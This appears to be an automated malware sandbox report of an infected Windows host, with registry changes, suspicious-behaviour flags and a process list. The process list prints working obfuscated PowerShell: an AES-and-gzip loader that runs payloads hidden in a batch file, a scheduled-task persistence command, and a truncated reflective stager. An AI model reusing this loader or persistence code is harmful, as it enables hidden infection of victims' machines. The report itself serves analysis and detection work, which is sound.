| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9df793d3-2b92-4650 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86d0a152-43d0-4144 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000019d9f32305b1da0119d9f32305b1da0119d9f32305b1da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc588a6d2000373939386434623438653766636533376565333664363862663062346438646631363831643562616361393530633662663138313865633633393037646463360000b20009000400efbebc588a6dbc588a6d2e00000000000000000000000000000000000000000000000000e7f82d00370039003900380064003400620034003800650037006600630065003300370065006500330036006400360038006200660030006200340064003800640066003100360038003100640035006200610063006100390035003000630036006200660031003800310038006500630036003300390030003700640064006300360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef05f8411000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37393938643462343865376663653337656533366436386266306234643864663136383164356261636139353063366266313831386563363339303764646336000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db1c8038243f0def11b8c0c2babbd8d0a35efd912f2a58f84f87a07e819e0464db1c8038243f0def11b8c0c2babbd8d0a3d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e8ec213-3ffa-4d79 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e8ec213-3ffa-4d79 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15b190d0-8256-458d = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000069eb062405b1da0169eb062405b1da0169eb062405b1da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc588a6d2000333363396564306239613731316532633437666630303031613438653531393130663063316430363730366534346365663861306631383439323332373530610000b20009000400efbebc588a6dbc588a6d2e0000000000000000000000000000000000000000000000000097e61a00330033006300390065006400300062003900610037003100310065003200630034003700660066003000300030003100610034003800650035003100390031003000660030006300310064003000360037003000360065003400340063006500660038006100300066003100380034003900320033003200370035003000610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef05f8411000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33336339656430623961373131653263343766663030303161343865353139313066306331643036373036653434636566386130663138343932333237353061000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db1e8038243f0def11b8c0c2babbd8d0a35efd912f2a58f84f87a07e819e0464db1e8038243f0def11b8c0c2babbd8d0a3d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9df793d3-2b92-4650 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded = d6fdfd2305b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86d0a152-43d0-4144 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9df793d3-2b92-4650 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9df793d3-2b92-4650 = "\\\\?\\Volume{8A2AD7B7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\33c9ed0b9a711e2c47ff0001a48e51910f0c1d06706e44cef8a0f1849232750a" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15b190d0-8256-458d | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff93091ceb8,0x7ff93091cec4,0x7ff93091ced0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=3260 /prefetch:3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New1.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\New1.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\New1.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_822_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_822.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4200,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:8
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_822.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_822.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_822.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_822.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Users\Admin\AppData\Local\Temp\New.exe
"C:\Users\Admin\AppData\Local\Temp\New.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kdQyXpvmJCQp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$shbhyLnDVVoFWr,[Parameter(Position=1)][Type]$XMCcOGwzok)$KxPdDFlXeZC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+'l'+'ec'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+'y'+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+''+'T'+'y'+[Char](112)+''+'e'+'',''+[Char](67)+'l'+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c,'+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'iC'+'l'+''+'a'+'s'+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$KxPdDFlXeZC.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'pe'+[Char](99)+'ia'+[Char](108)+''+[Char](78)+''+[Char](97)+'me'+','+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$shbhyLnDVVoFWr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$KxPdDFlXeZC.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'Hi'+'d'+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+'g'+','+''+[Char](78)+'ew'+'S'+'l'+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$XMCcOGwzok,$shbhyLnDVVoFWr).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'na'+'g'+'e'+[Char](100)+'');Write-Output $KxPdDFlXeZC.CreateType();}$vBxjDWxbCVwur=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 